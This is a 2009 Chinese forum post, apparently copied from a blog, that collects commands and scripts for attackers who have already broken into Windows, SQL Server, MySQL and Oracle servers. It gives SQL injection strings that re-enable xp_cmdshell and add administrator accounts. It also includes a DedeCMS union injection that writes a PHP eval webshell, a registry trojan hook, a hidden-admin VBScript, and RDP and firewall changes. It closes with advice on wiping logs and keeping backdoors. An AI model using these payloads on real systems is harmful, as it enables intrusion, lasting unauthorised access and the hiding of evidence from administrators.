|
|
摘自:Kindle's blog
1.net user administrator /passwordreq:no
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
2.比较巧妙的建克隆号的步骤
先建一个user的用户
然后导出注册表。然后在计算机管理里删掉
在导入,在添加为管理员组
3.查radmin密码
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
建立一个"services.exe"的项
再在其下面建立(字符串值)
键值为mu ma的全路径
5.runas /user:guest cmd
测试用户权限!
6.、tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
7.入侵后漏洞修补、痕迹清理,后门置放:
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
for example
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
如果要启用的话就必须把他加到高级用户模式
可以直接在注入点那里直接注入
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
或者
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
来恢复cmdshell。
分析器
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10.xp_cmdshell新的恢复办法
xp_cmdshell新的恢复办法
扩展储存过程被删除以后可以有很简单的办法恢复:
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
-----------------------------
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
开启cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshel
-------------------------
清除3389的登录记录用一条系统自带的命令:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
在 mysql里查看当前用户的权限
show grants for
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
Create USER 'itpro'@'%' IDENTIFIED BY '123';
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
搞完事记得删除脚印哟。
Drop USER 'itpro'@'%';
Drop DATABASE IF EXISTS `itpro` ;
当前用户获取system权限
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
程序代码<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec",user)
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
突破验证码限制入后台拿shell
程序代码REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000保存为code.reg,导入注册表,重器IE
就可以了
union写马
程序代码www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*应用在dedecms注射漏洞上,无后台写马
dedecms后台,无文件管理器,没有outfile权限的时候
在插件管理-病毒扫描里
写一句话进include/config_hand.php里
程序代码>';?><?php @eval($_POST[cmd]);?>
如上格式
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
程序代码select username,password from dba_users;
mysql远程连接用户
程序代码
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
1.查询终端端口
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg
2.开启XP&2003终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.更改终端端口为20008(0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5.开启Win2000的终端,端口为3389(需重启)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7.禁用TCP/IP端口筛选 (需重启)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8.终端超出最大连接数时可用下面的命令来连接
mstsc /v:ip:3389 /console
9.调整NTFS分区权限
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
删除awgina.dll的注册表键值
程序代码
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
程序代码echo Windows Registry Editor Version 5.00 >20002.reg&echo. >>20002.reg&echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>20002.reg&echo "Enabled"="0" >>20002.reg&echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>20002.reg&echo "ShutdownWithoutLogon"="0" >>20002.reg&echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>20002.reg&echo "EnableAdminTSRemote"=dword:00000001 >>20002.reg&echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>20002.reg&echo "TSEnabled"=dword:00000001 >>20002.reg&echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>20002.reg&echo "Start"=dword:00000002 >>20002.reg&echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>20002.reg&echo "Start"=dword:00000002 >>20002.reg&echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>20002.reg&echo "Hotkey"="1" >>20002.reg&echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>20002.reg&echo "PortNumber"=dword:00000D3D >>20002.reg&echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>20002.reg&echo "PortNumber"=dword:00000D3D >>20002.reg |
|
发表于 2009-7-1 20:12:09
